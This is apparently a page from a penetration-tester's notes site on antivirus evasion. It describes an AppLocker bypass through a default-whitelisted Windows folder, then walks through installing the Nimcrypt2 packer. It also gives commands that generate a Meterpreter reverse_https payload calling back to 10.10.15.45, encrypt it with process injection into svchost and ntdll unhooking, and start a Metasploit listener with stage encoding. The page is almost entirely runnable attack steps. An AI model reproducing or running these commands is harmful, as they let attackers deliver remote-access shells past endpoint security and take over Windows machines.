Anti-Virus Evasion

Applocker

AppLocker is an application whitelisting technology introduced with Windows 7.
It allows restricting which programs users can execute based on the programs path, publisher and hash.
If AppLocker is configured with default AppLocker rules, we can bypass it by placing our executable in the following directory:

C:\Windows\System32\spool\drivers\color

This is whitelisted by default.

Nimcrypt2

Usage:
  nimcrypt -f file_to_load -t csharp/raw/pe [-o <output>] [-p <process>] [-n] [-u] [-s] [-e] [-g] [-l] [-v] [--no-ppid-spoof]
  nimcrypt (-h | --help)

Options:
  -h --help     Show this screen.
  --version     Show version.
  -f --file filename     File to load
  -t --type filetype     Type of file (csharp, raw, or pe)
  -p --process process   Name of process for shellcode injection
  -o --output filename   Filename for compiled exe
  -u --unhook            Unhook ntdll.dll
  -v --verbose           Enable verbose messages during execution
  -e --encrypt-strings   Encrypt strings using the strenc module
  -g --get-syscallstub   Use GetSyscallStub instead of NimlineWhispers2
  -l --llvm-obfuscator   Use Obfuscator-LLVM to compile binary
  -n --no-randomization  Disable syscall name randomization
  -s --no-sandbox        Disable sandbox checks
  --no-ppid-spoof        Disable PPID Spoofing

Installation

git clone https://github.com/icyguider/Nimcrypt2.git
sudo apt install gcc mingw-w64 xz-utils git
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
echo "export PATH=$HOME/.nimble/bin:$PATH" >> ~/.bashrc
export PATH=$HOME/.nimble/bin:$PATH
nimble install winim nimcrypto docopt ptr_math strenc
cd /opt/Nimcrypt2
nim c -d=release --cc:gcc --embedsrc=on --hints=on --app=console --cpu=amd64 --out=nimcrypt nimcrypt.nim

Nimcrypt2 is a fantastic option for obfuscating your binaries, works with sliver, msf, and more
generate your payload

Metasploit with Nimcrypt

//Payload Generation 
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.15.45 LPORT=443 --encoder x86/shikata_ga_nai -i 3 -f exe -o start.exe

Now encrypt it with nimcrypt2

./nimcrypt -f start.exe -t pe -o security.exe -p svchost -e -u

Metasploit Listener Obsfucation

msfconsole -q
use exploit/multi/handler
set LHOST 10.10.15.45
set LPORT 443
set payload windows/x64/meterpreter/reverse_tcp
set EXITFUNC thread
set autoloadstdapi false
set autosysteminfo false
set enablestageencoding true
set stageencoder x64/xor_dynamic
run -j

Nimcrypt and Shellcode / PE

Generate your shellcode blob
Select a process to inject into, the default process is explorer.exe
If the process is not started, nimcrypt will spawn it and then inject into it

Shellcode

./nimcrypt2 -f shellcode.bon -t raw -o filename.exe -p process-name

PE

./nimcrypt2 -f shellcode.exe -t pe -o filename.exe

PreviousWindows Privlage Escalation NextWindows Registry

Last updated 2 years ago

Applocker

Nimcrypt2

Help Menu

Installation

Metasploit with Nimcrypt

Metasploit Listener Obsfucation

Nimcrypt and Shellcode / PE

Shellcode

PE